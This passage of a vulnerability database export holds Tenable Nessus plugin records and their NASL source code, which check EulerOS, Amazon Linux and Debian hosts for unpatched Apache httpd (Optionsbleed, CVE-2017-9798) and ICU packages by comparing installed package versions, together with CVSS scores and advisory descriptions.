script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libicu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libicu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libicu-50.1.2-15.h7.eulerosv2r7\",\n \"libicu-devel-50.1.2-15.h7.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icu\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-02T21:11:07", "description": "Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration.(CVE-2017-9798)", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-19T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd24 / httpd (ALAS-2017-896) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2019-04-10T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:httpd-tools", "p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-896.NASL", "href": "https://www.tenable.com/plugins/nessus/103309", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-896.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103309);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"ALAS\", value:\"2017-896\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 / httpd (ALAS-2017-896) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. The\nattacker sends an unauthenticated OPTIONS HTTP request when attempting\nto read secret data. This is a use-after-free issue and thus secret\ndata is not always sent, and the specific data depends on many factors\nincluding configuration.(CVE-2017-9798)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-896.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update httpd24' to update your system.\n\nRun 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.34-1.15.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-debuginfo-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-devel-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-manual-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd24-tools-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ldap-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_proxy_html-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_session-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod24_ssl-2.4.27-3.73.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.34-1.15.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:11:56", "description": "According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1252.NASL", "href": "https://www.tenable.com/plugins/nessus/104277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104277);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d09c3870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h8\",\n \"httpd-devel-2.4.6-45.0.1.4.h8\",\n \"httpd-manual-2.4.6-45.0.1.4.h8\",\n \"httpd-tools-2.4.6-45.0.1.4.h8\",\n \"mod_ssl-2.4.6-45.0.1.4.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:12:22", "description": "According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/104278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104278);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1253)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1253\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97163687\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h5\",\n \"httpd-devel-2.4.6-45.0.1.4.h5\",\n \"httpd-manual-2.4.6-45.0.1.4.h5\",\n \"httpd-tools-2.4.6-45.0.1.4.h5\",\n \"mod_ssl-2.4.6-45.0.1.4.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-14T16:12:12", "description": "According to its banner, the version of Apache running on the remote host is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP vulnerability related to the <Limit {method}> directive in an .htaccess file.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98913", "href": "https://www.tenable.com/plugins/was/98913", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-02T21:10:36", "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of .htaccess files by the Apache HTTP Server could result in memory disclosure.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "type": "nessus", "title": "Debian DLA-1102-1 : apache2 security update (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2", "p-cpe:/a:debian:debian_linux:apache2-dbg", "p-cpe:/a:debian:debian_linux:apache2-doc", "p-cpe:/a:debian:debian_linux:apache2-mpm-event", "p-cpe:/a:debian:debian_linux:apache2-mpm-itk", "p-cpe:/a:debian:debian_linux:apache2-mpm-prefork", "p-cpe:/a:debian:debian_linux:apache2-mpm-worker", "p-cpe:/a:debian:debian_linux:apache2-prefork-dev", "p-cpe:/a:debian:debian_linux:apache2-suexec", "p-cpe:/a:debian:debian_linux:apache2-suexec-custom", "p-cpe:/a:debian:debian_linux:apache2-threaded-dev", "p-cpe:/a:debian:debian_linux:apache2-utils", "p-cpe:/a:debian:debian_linux:apache2.2-bin", "p-cpe:/a:debian:debian_linux:apache2.2-common", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1102.NASL", "href": "https://www.tenable.com/plugins/nessus/103389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1102-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103389);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Debian DLA-1102-1 : apache2 security update (Optionsbleed)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/apache2\"\n );\n 